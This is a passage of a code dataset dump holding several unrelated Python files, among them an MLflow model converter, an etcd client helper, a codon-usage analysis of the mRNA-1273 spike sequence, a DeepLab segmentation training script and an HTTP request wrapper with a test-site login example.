light from the darkness God called the light day and the darkness he called night And there was evening and there was morning—the first day\n\"\"\"\ndef computeWordCount(text):\n mapOut = [(word.lower(),1) for word in text.split(' ')]\n shuffOutput = shuffle(mapOut)\n reduceOut = [(key, reduce(lambda sum, x: sum+x, value)) for (key, value) in shuffOutput]\n return reduceOut\n","sub_path":"Exercises/Exercise 6/flask-app/app/computeWordCount.py","file_name":"computeWordCount.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"344669280","text":"#!/usr/bin/env python3\n#\n# Copyright 2019 EPAM Systems\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport argparse\nimport contextlib\nimport json\nimport logging\nimport os\nimport os.path\nimport shutil\nimport sys\nimport tarfile\nfrom typing import Optional\nfrom urllib import parse\n\nimport yaml\nfrom odahuflow.sdk.gppi.executor import GPPITrainedModelBinary\nfrom odahuflow.sdk.gppi.models import OdahuflowProjectManifest, OdahuflowProjectManifestBinaries, \\\n OdahuflowProjectManifestModel, OdahuflowProjectManifestToolchain, OdahuflowProjectManifestOutput\nfrom odahuflow.sdk.models import K8sTrainer, ModelIdentity\nfrom odahuflow.sdk.models import ModelTraining\n\nfrom odahuflow.trainer.helpers.conda import run_mlflow_wrapper, update_model_conda_env\nfrom odahuflow.trainer.helpers.fs import copytree\n\nimport mlflow\nimport mlflow.models\nimport mlflow.projects\nimport mlflow.pyfunc\nimport mlflow.tracking\nfrom mlflow.tracking import set_tracking_uri, get_tracking_uri, MlflowClient\n\nMODEL_SUBFOLDER = 'odahuflow_model'\nODAHUFLOW_PROJECT_DESCRIPTION = 'odahuflow.project.yaml'\nENTRYPOINT = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates', 'entrypoint.py')\n\n\n\ndef parse_model_training_entity(source_file: str) -> K8sTrainer:\n \"\"\"\n Parse model training file\n \"\"\"\n logging.info(f'Parsing Model Training file: {source_file}')\n\n # Validate resource file exist\n if not os.path.exists(source_file) or not os.path.isfile(source_file):\n raise ValueError(f'File {source_file} is not readable')\n\n with open(source_file, 'r', encoding='utf-8') as mt_file:\n mt = mt_file.read()\n logging.debug(f'Content of {source_file}:\\n{mt}')\n\n try:\n mt = json.loads(mt)\n except json.JSONDecodeError:\n try:\n mt = yaml.safe_load(mt)\n except json.JSONDecodeError as decode_error:\n raise ValueError(f'Cannot decode ModelTraining resource file: {decode_error}') from decode_error\n\n return K8sTrainer.from_dict(mt)\n\n\ndef save_models(mlflow_run_id: str, model_training: ModelTraining, target_directory: str) -> None:\n \"\"\"\n Save models after run\n \"\"\"\n # Using internal API for getting store and artifacts location\n store = mlflow.tracking._get_store()\n artifact_uri = store.get_run(mlflow_run_id).info.artifact_uri\n logging.info(f\"Artifacts location detected. Using store {store}\")\n\n parsed_url = parse.urlparse(artifact_uri)\n if parsed_url.scheme and parsed_url.scheme != 'file':\n raise ValueError(f'Unsupported scheme of url: {parsed_url}')\n artifacts_path = parsed_url.path\n\n logging.info(f\"Analyzing directory {artifact_uri} for models\")\n artifacts_abs_paths = map(lambda path: os.path.join(artifacts_path, path), os.listdir(artifacts_path))\n found_models = list(filter(lambda path: load_pyfunc_model(path, none_on_failure=True), artifacts_abs_paths))\n\n if len(found_models) != 1:\n raise ValueError(f'Expected to find exactly 1 model, found {len(found_models)}')\n\n mlflow_to_gppi(model_training.spec.model, found_models[0], target_directory, mlflow_run_id)\n\n\ndef load_pyfunc_model(path: str, none_on_failure=False) -> Optional[mlflow.models.Model]:\n \"\"\"Loads Mlflow models with pyfunc flavor\n :param none_on_failure: return None instead of raising exception on failure\n :raises Exception: if provided path is not an MLFlow model\n \"\"\"\n try:\n mlflow_model = mlflow.models.Model.load(path)\n except Exception:\n if none_on_failure:\n return None\n raise\n\n if mlflow.pyfunc.FLAVOR_NAME not in mlflow_model.flavors.keys():\n if none_on_failure:\n return None\n raise ValueError(f\"{path} does not has {mlflow.pyfunc.FLAVOR_NAME} flavor\")\n return mlflow_model\n\n\ndef mlflow_to_gppi(model_meta: ModelIdentity, mlflow_model_path: str, gppi_model_path: str, mlflow_run_id: str):\n \"\"\"Wraps an MLFlow model with a GPPI interface\n :param model_meta: container for model name and version\n :param mlflow_model_path: path to MLFlow model\n :param gppi_model_path: path to target GPPI directory, should be empty\n :param mlflow_run_id: mlflow run id for model\n \"\"\"\n try:\n mlflow_model = load_pyfunc_model(mlflow_model_path)\n except Exception as load_exception:\n raise ValueError(f\"{mlflow_model_path} is not a MLflow model: {load_exception}\") from load_exception\n\n mlflow_target_directory = os.path.join(gppi_model_path, MODEL_SUBFOLDER)\n\n logging.info(f\"Copying MLflow model from {mlflow_model_path} to {mlflow_target_directory}\")\n\n if not os.path.exists(mlflow_target_directory):\n os.makedirs(mlflow_target_directory)\n copytree(mlflow_model_path, mlflow_target_directory)\n\n py_flavor = mlflow_model.flavors[mlflow.pyfunc.FLAVOR_NAME]\n\n env = py_flavor.get('env')\n if not env:\n raise ValueError('Unknown type of env - empty')\n\n dependencies = 'conda'\n conda_path = os.path.join(MODEL_SUBFOLDER, env)\n logging.info(f'Conda env located in {conda_path}')\n\n entrypoint_target = os.path.join(mlflow_target_directory, 'entrypoint.py')\n shutil.copyfile(ENTRYPOINT, entrypoint_target)\n\n project_file_path = os.path.join(gppi_model_path, ODAHUFLOW_PROJECT_DESCRIPTION)\n\n manifest = OdahuflowProjectManifest(\n odahuflowVersion='1.0',\n binaries=OdahuflowProjectManifestBinaries(\n type='python',\n dependencies=dependencies,\n conda_path=conda_path\n ),\n model=OdahuflowProjectManifestModel(\n name=model_meta.name,\n version=model_meta.version,\n workDir=MODEL_SUBFOLDER,\n entrypoint='entrypoint'\n ),\n toolchain=OdahuflowProjectManifestToolchain(\n name='mlflow',\n version=mlflow.__version__\n ),\n output=OdahuflowProjectManifestOutput(\n run_id=mlflow_run_id\n )\n )\n\n with open(project_file_path, 'w', encoding='utf-8') as proj_stream:\n yaml.dump(manifest.dict(), proj_stream)\n\n logging.info(\"GPPI stored. Starting GPPI validation\")\n mb = GPPITrainedModelBinary(gppi_model_path)\n mb.self_check()\n logging.info(\"GPPI is validated. OK\")\n\n\ndef get_or_create_experiment(experiment_name, artifact_location=None) -> str:\n client = MlflowClient()\n\n # Registering of experiment on tracking server if it is not exist\n logging.info(f\"Searching for experiment with name {experiment_name}\")\n experiment = client.get_experiment_by_name(experiment_name)\n\n if experiment:\n experiment_id = experiment.experiment_id\n logging.info(f\"Experiment {experiment_id} has been found\")\n else:\n logging.info(f\"Creating new experiment with name {experiment_name}\")\n\n experiment_id = client.create_experiment(experiment_name, artifact_location=artifact_location)\n\n logging.info(f\"Experiment {experiment_id} has been created\")\n client.get_experiment_by_name(experiment_name)\n return experiment_id\n\n\ndef train_models(model_training: ModelTraining, experiment_id: str) -> str:\n \"\"\"\n Start MLfLow run\n \"\"\"\n logging.info('Downloading conda dependencies')\n update_model_conda_env(model_training)\n\n logging.info('Getting of tracking URI')\n tracking_uri = get_tracking_uri()\n if not tracking_uri:\n raise ValueError('Can not get tracking URL')\n logging.info(f\"Using MLflow client placed at {tracking_uri}\")\n\n logging.info('Creating MLflow client, setting tracking URI')\n set_tracking_uri(tracking_uri)\n\n # Starting run and awaiting of finish of run\n logging.info(f\"Starting MLflow's run function. Parameters: [project directory: {model_training.spec.work_dir}, \"\n f\"entry point: {model_training.spec.entrypoint}, \"\n f\"hyper parameters: {model_training.spec.hyper_parameters}, \"\n f\"experiment id={experiment_id}]\")\n\n mlflow_input = {\n \"uri\": model_training.spec.work_dir,\n \"entry_point\": model_training.spec.entrypoint,\n \"parameters\": model_training.spec.hyper_parameters,\n \"experiment_id\": experiment_id,\n \"backend\": 'local',\n \"synchronous\": True,\n \"use_conda\": False,\n }\n\n run_id = run_mlflow_wrapper(mlflow_input)\n\n # TODO: refactor\n client = MlflowClient()\n client.set_tag(run_id, \"training_id\", model_training.id)\n client.set_tag(run_id, \"model_name\", model_training.spec.model.name)\n client.set_tag(run_id, \"model_version\", model_training.spec.model.version)\n\n logging.info(f\"MLflow's run function finished. Run ID: {run_id}\")\n\n return run_id\n\n\ndef setup_logging(args: argparse.Namespace) -> None:\n \"\"\"\n Setup logging instance\n \"\"\"\n log_level = logging.DEBUG if args.verbose else logging.INFO\n\n logging.basicConfig(format='[odahuflow][%(levelname)5s] %(asctime)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S',\n level=log_level)\n\n\n@contextlib.contextmanager\ndef _remember_cwd():\n curdir = os.getcwd()\n try:\n yield\n finally:\n os.chdir(curdir)\n\n\ndef mlflow_to_gppi_cli():\n\n def make_dir(string):\n try:\n os.makedirs(string, exist_ok=True)\n except FileExistsError as error:\n raise ValueError(f'A file already exists with the same name: {string}\\n'\n 'Rename file or directory and try again.') from error\n\n def dir_type(string):\n if not os.path.isdir(string):\n raise ValueError\n return string\n\n parser = argparse.ArgumentParser(description='Converts MLFLow model to GPPI.')\n\n parser.add_argument('--verbose', action='store_true', help='More extensive logging')\n parser.add_argument('--model-name', type=str, required=True, help='Name of GPPI Model')\n parser.add_argument('--model-version', type=str, required=True, help='Version of GPPI Model')\n parser.add_argument('--mlflow-model-path', '--mlflow', required=True,\n type=dir_type, help='Path to source MLFlow model directory')\n parser.add_argument('--gppi-model-path', '--gppi', required=True,\n type=str, help='Path to result GPPI model directory')\n parser.add_argument('--mlflow-run-id', type=str, required=True, help='Run ID for MLFlow model')\n parser.add_argument('--no-tgz', dest='tgz', action='store_false', help='Prevent archiving result directory')\n args = parser.parse_args()\n\n setup_logging(args)\n gppi_model_path: str = args.gppi_model_path\n\n make_dir(gppi_model_path)\n\n if len(os.listdir(gppi_model_path)) > 0:\n logging.error(\"Result directory must be empty!\")\n\n try:\n mlflow_to_gppi(model_meta=ModelIdentity(name=args.model_name.strip(), version=args.model_version.strip()),\n mlflow_model_path=args.mlflow_model_path,\n gppi_model_path=gppi_model_path,\n mlflow_run_id=args.mlflow_run_id)\n\n if args.tgz:\n with _remember_cwd(), tarfile.open(f'{gppi_model_path}.tgz', 'w:gz') as tar: # type: tarfile.TarFile\n os.chdir(args.gppi_model_path)\n for s in os.listdir('.'):\n tar.add(s)\n shutil.rmtree(gppi_model_path)\n\n except Exception as e:\n error_message = f'Exception occurs during model conversion. Message: {e}'\n\n if args.verbose:\n logging.exception(error_message)\n else:\n logging.error(error_message)\n\n sys.exit(1)\n","sub_path":"mlflow/odahuflow/trainer/helpers/mlflow_helper.py","file_name":"mlflow_helper.py","file_ext":"py","file_size_in_byte":12051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"484172670","text":"# -*- coding: utf-8 -*-\n\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom __future__ import absolute_import\n\nimport functools\nimport logging\nimport operator\nimport time\n\nimport etcd\n\nfrom entrypoint.args import VARIABLES\n\nLOG = logging.getLogger(__name__)\n\n\ndef retry(f):\n @functools.wraps(f)\n def decorate(*args, **kwargs):\n attempts = VARIABLES[\"etcd\"][\"attempts\"]\n attempts_delay = VARIABLES[\"etcd\"][\"attempts_delay\"]\n for i in range(attempts):\n try:\n return f(*args, **kwargs)\n except etcd.EtcdException as e:\n LOG.warning(\"Etcd fails with error on attempt %s/%s: %s\",\n i, attempts, str(e))\n time.sleep(attempts_delay)\n return f(*args, **kwargs)\n return decorate\n\n\n@retry\ndef get_etcd_client():\n hosts = list(map(operator.itemgetter(\"address\", \"port\"),\n VARIABLES[\"etcd\"][\"endpoint\"]))\n hosts_str = \",\".join(\"{0}:{1}\".format(*host) for host in hosts)\n LOG.debug(\"Using the following etcd hosts: %s\", hosts_str)\n client = etcd.Client(host=tuple(hosts), allow_reconnect=True,\n read_timeout=5)\n return client\n","sub_path":"entrypoint/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"130640527","text":"# Analysis of SARS CoV 2 Spike protein in an attempt to replicate mrna-1273 sequence\n# 08.05.2021 - Zachary Sykes\n\nimport os\nfrom Bio.Seq import Seq\nfrom Bio.SeqUtils import GC123\n\nfrom file_handling import data_extraction\nfrom file_handling import file_output\n\n# PATHs set\nproj_path = os.path.abspath(os.getcwd())\nsars_cov_2_aa = os.path.join(proj_path, 'SARS_CoV_2_aaSeq/') # SARS CoV 2 S protein sequences\nmrna_1273_sequence = os.path.join(proj_path, 'mrna1273_fastaSeq/') # mRNA-1273 fasta file\n\n# Human codon table\nhsap_codon_table = {'F': ['TTT', 'TTC'],\n 'L': ['TTA', 'TTG', 'CTT', 'CTC', 'CTA', 'CTG'],\n 'S': ['TCT', 'TCC', 'TCA', 'TCG', 'AGT', 'AGC'],\n 'Y': ['TAT', 'TAC'], '*': ['TAA', 'TAG', 'TGA'],\n 'C': ['TGT', 'TGC'], 'W': ['TGG'],\n 'P': ['CCT', 'CCC', 'CCA', 'CCG'],\n 'H': ['CAT', 'CAC'], 'Q': ['CAA', 'CAG'],\n 'R': ['CGT', 'CGC', 'CGA', 'CGG', 'AGA', 'AGG'],\n 'I': ['ATT', 'ATC', 'ATA'], 'M': ['ATG'],\n 'T': ['ACT', 'ACC', 'ACA', 'ACG'],\n 'N': ['AAT', 'AAC'], 'K': ['AAA', 'AAG'],\n 'V': ['GTT', 'GTC', 'GTA', 'GTG'],\n 'A': ['GCT', 'GCC', 'GCA', 'GCG'],\n 'D': ['GAT', 'GAC'], 'E': ['GAA', 'GAG'],\n 'G': ['GGT', 'GGC', 'GGA', 'GGG']}\n\n\n# Builds a dynamic codon table based on codons present in NT sequence\n# Takes a NT seq str and an AA seq str (or Seq obj from Biopython)\ndef codon_counter(nt, codons, nt_type='dna'):\n\n # Stores codons used for each amino acid and frequency used for said amino acid\n codon_table = dict()\n\n # Grabs the key (aa) for the given value (codon)\n def get_key(val):\n for key, value in codons.items():\n if val in value:\n return key\n\n # Handles a RNA string passed to the codon counter\n if nt_type == 'rna' and type(nt) is not Seq:\n nt = Seq(nt)\n nt = nt.back_transcribe()\n elif nt_type == 'rna' and type(nt) is Seq:\n nt = nt.back_transcribe()\n\n start = None\n stop = None\n\n # Start and stop codons identified for the sequence\n for frame in range(0, len(nt), 3):\n if nt[frame: frame + 3] == 'ATG' and not start:\n print(f'Start codon {nt[frame: frame + 3]} identified at position {frame}')\n start = frame\n # mRNA-1273 contains all three stop codons at the end of the sequence\n # TAG was the last one before the 3' UTR so all stop codons included in the codon table\n if nt[frame: frame + 3] == 'TAG' and not stop:\n print(f'Stop codon {nt[frame: frame + 3]} identified at position {frame}')\n stop = frame + 3\n\n # Trimmed nt sequence starting at ATG and ending at TAG\n nt_cds = nt[start:stop]\n prev_codon = ''\n # Counting codons used per amino acid\n for frame in range(3, (len(nt_cds) + 3), 3):\n aa = get_key(nt_cds[frame - 3: frame])\n codon_table.setdefault(aa, []).append(str(nt_cds[frame - 3: frame]))\n\n # Returns a list of tuples (codon, num times used to translate aa in nt seq provided / total codons for aa)\n for aa in codon_table.keys():\n codon_counts = {aa: [(codon, round(codon_table[aa].count(codon) / len(codon_table[aa]), 3))\n for codon in set(codon_table[aa])]}\n codon_table.update(codon_counts)\n print(GC123(nt_cds))\n\n return codon_table\n\n\n# Storing AA and NT sequence data for SARS CoV 2 Spike protein\naa_seq = data_extraction(sars_cov_2_aa, 'sars_cov_2_aa.fasta')\nmrna1273_dna_seq = data_extraction(mrna_1273_sequence, 'mrna1273_spike_encoding.fasta')\n\n# Substituting the 2 proline at residues 986 and 987 to spike protein sequence\naa_s2p_seq = aa_seq[0][:985] + 'PP' + aa_seq[0][987:]\nfile_output(\n sars_cov_2_aa,\n 'sars_cov_2_s2p_aa.fasta',\n f'{aa_seq[1]}_S2P_986|987',\n aa_s2p_seq\n) # Copy of S2P variant saved to disk\n\n\n# Generating a codon table with frequencies of use from an NT sequence\n# Codon table passed is the human codon/amino acid associations table\n# NT sequence is mRNA-1273 encoding the S2P perfusion stabilized variant of the SARS-CoV-2 spike protein\nfor k, v in codon_counter(mrna1273_dna_seq[0], hsap_codon_table).items():\n print(k, v)\n\n# NOTE - There is a preferred codon for each amino acid in the encoded in mRNA-1273\n# NOTE - In very low frequency a synonymous codon is selected.\n# NOTE - Multiple readings on degenerate codons usage across genomes leads me to believe that the reason\n# NOTE - for the low frequency synonymous codon usage is due to regional GC content\n","sub_path":"sars_cov2_mrna1273_reverse_engineer.py","file_name":"sars_cov2_mrna1273_reverse_engineer.py","file_ext":"py","file_size_in_byte":4672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"120675099","text":"def project(data,dic,column,table):\n array=[]\n index=0\n for x in data:\n if data[x]['name']==table:\n for y in data[x]['columns']:\n if y==column:\n index=data[x]['columns'].index(y)\n for y in data[x]['values']:\n array.append(y[index])\n new_array=[]\n if dic['distinct']==1:\n for i in array:\n if i not in new_array:\n new_array.append(i)\n else:\n new_array=array\n print(column)\n for x in new_array:\n print(x)\n","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"128490530","text":"#Notice for deeplabv2\n# Image scale to [-127, 128]\n\nimport sys, os\nimport torch\nimport argparse\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.models as models\n\nfrom torch.autograd import Variable\nfrom torch.utils import data\nfrom tqdm import tqdm\n\nfrom ptsemseg.models import get_model\nfrom ptsemseg.loader import get_loader, get_data_path\nfrom ptsemseg.metrics import runningScore\nfrom ptsemseg.loss import *\nfrom ptsemseg.augmentations import *\nfrom tqdm import tqdm\nfrom pytorchgo.utils import logger\nfrom pytorchgo.utils.pytorch_utils import optimizer_summary\nfrom pytorchgo.utils.learning_rate import adjust_learning_rate\n\nfrom pytorchgo.loss import CrossEntropyLoss2d_Seg\n\nis_debug = 0\n\ntrain_img_shape = (473, 473)\n\ndef train(args):\n\n logger.auto_set_dir()\n from pytorchgo.utils.pytorch_utils import set_gpu\n set_gpu(args.gpu)\n\n\n # Setup Dataloader\n from pytorchgo.augmentation.segmentation import SubtractMeans, PIL2NP, RGB2BGR,PIL_Scale, Value255to0, ToLabel\n from torchvision.transforms import Compose, Normalize, ToTensor\n img_transform = Compose([ # notice the order!!!\n PIL_Scale(train_img_shape, Image.BILINEAR),\n PIL2NP(),\n RGB2BGR(),\n SubtractMeans(),\n ToTensor(),\n ])\n\n label_transform = Compose([\n PIL_Scale(train_img_shape, Image.NEAREST),\n PIL2NP(),\n Value255to0(),\n ToLabel()\n\n ])\n\n val_img_transform = Compose([\n PIL_Scale(train_img_shape, Image.BILINEAR),\n PIL2NP(),\n RGB2BGR(),\n SubtractMeans(),\n ToTensor(),\n ])\n val_label_transform = Compose([PIL_Scale(train_img_shape, Image.NEAREST),\n PIL2NP(),\n ToLabel(),\n # notice here, training, validation size difference, this is very tricky.\n ])\n\n from pytorchgo.dataloader.pascal_voc_loader import pascalVOCLoader as common_voc_loader\n train_loader = common_voc_loader( split=\"train_aug\", epoch_scale=1, img_transform=img_transform, label_transform=label_transform)\n\n n_classes = train_loader.n_classes\n trainloader = data.DataLoader(train_loader, batch_size=args.batch_size, num_workers=8, shuffle=True)\n\n validation_loader = common_voc_loader(split='val', img_transform=val_img_transform, label_transform=val_label_transform)\n valloader = data.DataLoader(validation_loader, batch_size=args.batch_size, num_workers=8)\n\n # Setup Metrics\n running_metrics = runningScore(n_classes)\n\n\n # Setup Model\n from pytorchgo.model.deeplabv1 import VGG16_LargeFoV\n from pytorchgo.model.deeplab_resnet import Res_Deeplab\n\n model = Res_Deeplab(NoLabels=n_classes, pretrained=True, output_all=False)\n\n from pytorchgo.utils.pytorch_utils import model_summary,optimizer_summary\n model_summary(model)\n\n\n\n\n def get_validation_miou(model):\n model.eval()\n for i_val, (images_val, labels_val) in tqdm(enumerate(valloader), total=len(valloader), desc=\"validation\"):\n if i_val > 5 and is_debug==1: break\n if i_val > 200 and is_debug==2:break\n\n #img_large = torch.Tensor(np.zeros((1, 3, 513, 513)))\n #img_large[:, :, :images_val.shape[2], :images_val.shape[3]] = images_val\n\n output = model(Variable(images_val, volatile=True).cuda())\n output = output\n pred = output.data.max(1)[1].cpu().numpy()\n #pred = output[:, :images_val.shape[2], :images_val.shape[3]]\n\n gt = labels_val.numpy()\n\n running_metrics.update(gt, pred)\n\n score, class_iou = running_metrics.get_scores()\n for k, v in score.items():\n logger.info(\"{}: {}\".format(k, v))\n running_metrics.reset()\n return score['Mean IoU : \\t']\n\n\n model.cuda()\n \n # Check if model has custom optimizer / loss\n if hasattr(model, 'optimizer'):\n logger.warn(\"don't have customzed optimizer, use default setting!\")\n optimizer = model.module.optimizer\n else:\n optimizer = torch.optim.SGD(model.optimizer_params(args.l_rate), lr=args.l_rate, momentum=0.99, weight_decay=5e-4)\n\n optimizer_summary(optimizer)\n if args.resume is not None: \n if os.path.isfile(args.resume):\n logger.info(\"Loading model and optimizer from checkpoint '{}'\".format(args.resume))\n checkpoint = torch.load(args.resume)\n model.load_state_dict(checkpoint['model_state'])\n optimizer.load_state_dict(checkpoint['optimizer_state'])\n logger.info(\"Loaded checkpoint '{}' (epoch {})\"\n .format(args.resume, checkpoint['epoch']))\n else:\n logger.info(\"No checkpoint found at '{}'\".format(args.resume))\n\n best_iou = 0\n logger.info('start!!')\n for epoch in tqdm(range(args.n_epoch),total=args.n_epoch):\n model.train()\n for i, (images, labels) in tqdm(enumerate(trainloader),total=len(trainloader), desc=\"training epoch {}/{}\".format(epoch, args.n_epoch)):\n if i > 10 and is_debug==1: break\n\n if i> 200 and is_debug==2:break\n\n cur_iter = i + epoch*len(trainloader)\n cur_lr = adjust_learning_rate(optimizer,args.l_rate,cur_iter,args.n_epoch*len(trainloader),power=0.9)\n\n\n images = Variable(images.cuda())\n labels = Variable(labels.cuda())\n\n optimizer.zero_grad()\n outputs = model(images) # use fusion score\n loss = CrossEntropyLoss2d_Seg(input=outputs, target=labels, class_num=n_classes)\n\n #for i in range(len(outputs) - 1):\n #for i in range(1):\n # loss = loss + CrossEntropyLoss2d_Seg(input=outputs[i], target=labels, class_num=n_classes)\n\n loss.backward()\n optimizer.step()\n\n\n if (i+1) % 100 == 0:\n logger.info(\"Epoch [%d/%d] Loss: %.4f, lr: %.7f, best mIoU: %.7f\" % (epoch+1, args.n_epoch, loss.data[0], cur_lr, best_iou))\n\n\n cur_miou = get_validation_miou(model)\n if cur_miou >= best_iou:\n best_iou = cur_miou\n state = {'epoch': epoch+1,\n 'mIoU': best_iou,\n 'model_state': model.state_dict(),\n 'optimizer_state' : optimizer.state_dict(),}\n torch.save(state, os.path.join(logger.get_logger_dir(), \"best_model.pth\"))\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Hyperparams')\n parser.add_argument('--arch', nargs='?', type=str, default='deeplabv1',\n help='Architecture to use [\\'fcn8s, unet, segnet etc\\']')\n parser.add_argument('--dataset', nargs='?', type=str, default='pascal', \n help='Dataset to use [\\'pascal, camvid, ade20k etc\\']')\n\n parser.add_argument('--n_epoch', nargs='?', type=int, default=16,\n help='# of the epochs')\n parser.add_argument('--batch_size', nargs='?', type=int, default=3,\n help='Batch Size')\n parser.add_argument('--l_rate', nargs='?', type=float, default=2.5e-4, # original implementation of deeplabv1 learning rate is 1e-3 and poly update\n help='Learning Rate')\n parser.add_argument('--feature_scale', nargs='?', type=int, default=1, \n help='Divider for # of features to use')\n parser.add_argument('--resume', nargs='?', type=str, default=None, \n help='Path to previous saved model to restart from')\n parser.add_argument('--gpu', type=int, default=1,\n help='gpu')\n\n\n args = parser.parse_args()\n train(args)\n","sub_path":"example/pytorch-semseg/train.pascal.deeplabv2.commonloader.epoch16.py","file_name":"train.pascal.deeplabv2.commonloader.epoch16.py","file_ext":"py","file_size_in_byte":7753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"198972338","text":"\"\"\"\n============================\nauthor:MuSen\ntime:2019/6/12\nE-mail:3247119728@qq.com\n============================\n\"\"\"\nimport requests\nfrom common.logger import logger\n\n\"\"\"\n封装的目的:\n1、是为了根据用例中的请求方法,来决定发起什么类型的请求\n2、输出login日志\n\n\"\"\"\n\n\nclass HTTPRequest(object):\n \"\"\"直接发请求,不记录cookies信息的 \"\"\"\n\n def request(self, method, url,\n params=None, data=None,\n headers=None, cookies=None, json=None):\n # 判断请求的方法\n\n method = method.lower()\n if method == 'post':\n # 判断是否使用json来传参(适用于项目中接口参数有使用json传参的)\n if json:\n logger.info('正在发送请求,请求地址:{},请求参数:{}'.format(url, json))\n return requests.post(url=url, json=json, headers=headers, cookies=cookies)\n else:\n logger.info('正在发送请求,请求地址:{},请求参数:{}'.format(url, data))\n return requests.post(url=url, data=data, headers=headers, cookies=cookies)\n elif method == 'get':\n logger.info('正在发送请求,请求地址:{},请求参数:{}'.format(url, params))\n return requests.get(url=url, params=params, headers=headers, cookies=cookies)\n\n\nclass HTTPRequest2(object):\n \"\"\"记录cookies信息,给下一次请求用 \"\"\"\n\n def __init__(self):\n # 创建一个session对象\n self.session = requests.sessions.Session()\n\n def request(self, method, url,\n params=None, data=None,\n headers=None, cookies=None, json=None):\n # 判断请求的方法\n\n method = method.lower()\n if method == 'post':\n # 判断是否使用json来传参(适用于项目中接口参数有使用json传参的)\n if json:\n logger.info('正在发送请求,请求地址:{},请求参数:{}'.format(url, json))\n return self.session.post(url=url, json=json, headers=headers, cookies=cookies)\n else:\n logger.info('正在发送请求,请求地址:{},请求参数:{}'.format(url, data))\n return self.session.post(url=url, data=data, headers=headers, cookies=cookies)\n elif method == 'get':\n logger.info('正在发送请求,请求地址:{},请求参数:{}'.format(url, params))\n return self.session.get(url=url, params=params, headers=headers, cookies=cookies)\n\n\nif __name__ == '__main__':\n r = HTTPRequest()\n login_url = \"http://test.lemonban.com/futureloan/mvc/api/member/login\"\n\n login_data = {\"mobilephone\": \"15567678989\", \"pwd\": \"123qwe\"}\n # 登录\n r.request(method='post', url=login_url, data=login_data)\n # 充值\n rech_url = \"http://test.lemonban.com/futureloan/mvc/api/member/recharge\"\n # 构建充值的参数\n data = {\"mobilephone\": \"15567678989\", \"amount\": 100}\n response = r.request(method='post', url=rech_url, data=data)\n print(response.text)\n","sub_path":"APIautotest-python/api/uilt/api_02day/http_requests.py","file_name":"http_requests.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"339987863","text":"import operator\nimport pandas as pd\nfrom pwa.blueprints.auth.models import User\n\n\ndef parse_users():\n dict_list = []\n members = User.query.all()\n for iii, member in enumerate(members):\n member = member.__dict__\n for item in member:\n if member[item] == None:\n member[item] = \"\"\n try:\n org = member['organization'].value\n except AttributeError:\n org = ''\n try:\n birth = member['birthday'].strftime(\"%B %e\")\n except AttributeError:\n birth = ''\n dict_list.append({'Name': member['first_name'] + \" \" + member['last_name'],\n 'Home Phone': member['home_phone'], 'Other Work Phone': member['other_work_phone'],\n 'Cell Phone': member['cell_phone'], 'Birthday': birth, 'Email': member['email'], 'Organization': org})\n dict_list = sorted(dict_list, key=operator.itemgetter(\"Organization\", \"Name\"), reverse=True)\n df = pd.DataFrame()\n for user in dict_list:\n df = df.append(pd.Series(user), ignore_index=True)\n column_order = [\"Name\", \"Organization\", \"Cell Phone\", \"Home Phone\", \"Other Work Phone\", \"Birthday\", \"Email\"]\n df = df[column_order].T.to_dict()\n return df\n","sub_path":"pwa/blueprints/mai_lab/services/parse_users.py","file_name":"parse_users.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"174729709","text":"\nimport logging\nimport warnings\nfrom urllib.parse import quote\n\nimport requests\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\n\nlogger = logging.getLogger(__name__)\n\n\ndef is_remote_api_configured():\n return getattr(settings, 'GATEWAY_DATA_STORE_REMOTE_API', None) is not None\n\n\ndef call(request,\n path,\n path_params=None,\n method=\"get\",\n raise_for_status=True,\n base_url=\"/api\",\n **kwargs):\n\n headers = {\n 'Authorization': f'Bearer {request.authz_token.accessToken}'}\n encoded_path_params = {}\n if path_params is not None:\n for pk, pv in path_params.items():\n encoded_path_params[pk] = quote(pv)\n encoded_path = path.format(**encoded_path_params)\n logger.debug(f\"encoded_path={encoded_path}\")\n remote_api_url = settings.GATEWAY_DATA_STORE_REMOTE_API\n if remote_api_url.endswith(\"/api\"):\n warnings.warn(f\"Set GATEWAY_DATA_STORE_REMOTE_API to \\\"{remote_api_url}\\\". /api is no longer needed.\", DeprecationWarning)\n remote_api_url = remote_api_url[0:remote_api_url.rfind(\"/api\")]\n r = requests.request(\n method,\n f'{remote_api_url}{base_url}{encoded_path}',\n 